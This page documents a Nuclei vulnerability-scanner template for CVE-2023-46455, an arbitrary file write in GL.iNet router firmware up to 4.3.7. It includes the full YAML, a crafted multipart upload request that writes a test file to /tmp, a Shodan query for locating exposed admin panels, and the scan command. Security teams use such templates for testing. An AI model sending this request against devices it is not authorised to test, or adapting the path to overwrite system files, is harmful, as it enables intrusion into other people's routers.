Skip to content
Nuclei Templates

GL.iNet <= 4.3.7 - Arbitrary File Write

ID: CVE-2023-46455

Severity: high

Author: Zierax

Tags: cve,cve2023,gl-net,file-upload,intrusive

Description

Section titled “Description”

GL.iNet <= 4.3.7 is vulnerable to an arbitrary file write exploit, allowing an attacker to overwrite arbitrary system files.

YAML Source

Section titled “YAML Source”
id: CVE-2023-46455


info:
  name: GL.iNet <= 4.3.7 - Arbitrary File Write
  author: Zierax
  severity: high
  description: |
    GL.iNet <= 4.3.7 is vulnerable to an arbitrary file write exploit, allowing an attacker to overwrite arbitrary system files.
  reference:
    - https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities/blob/main/CVE-2023-46455.py
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46455
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-46455
    cwe-id: CWE-22
    cpe: cpe:2.3:o:gl-inet:gl-ar300m_firmware:4.3.7:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gl-inet
    product: gl-ar300m_firmware
    shodan-query: title:"GL.iNet Admin Panel"
  tags: cve,cve2023,gl-net,file-upload,intrusive


variables:
  string: "{{to_lower(rand_text_alpha(5))}}"
  file: "{{to_lower(rand_text_alpha(4))}}"


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: body
        words:
          - "GL.iNet"
        internal: true
        case-insensitive: true


  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------81419250823331111993422505835
        X-Requested-With: XMLHttpRequest


        -----------------------------81419250823331111993422505835
        Content-Disposition: form-data; name="sid"


        {{auth_token}}
        -----------------------------81419250823331111993422505835
        Content-Disposition: form-data; name="size"


        4
        -----------------------------81419250823331111993422505835
        Content-Disposition: form-data; name="path"


        /tmp/{{string}}
        -----------------------------81419250823331111993422505835
        Content-Disposition: form-data; name="file"; filename="{{file}}"
        Content-Type: application/octet-stream


        {{string}}
        -----------------------------81419250823331111993422505835--


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "File uploaded successfully"


      - type: status
        status:
          - 200
# digest: 4a0a004730450221009706a6d0d5bce1b42f3609f3063bd35cfd250ad7672a3c70f452deb72116af27022059002b0dbe36bd0023f689d709b411e048469e49aee6a1ff0bf883ba4d1ef5cb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-46455.yaml"

View on Github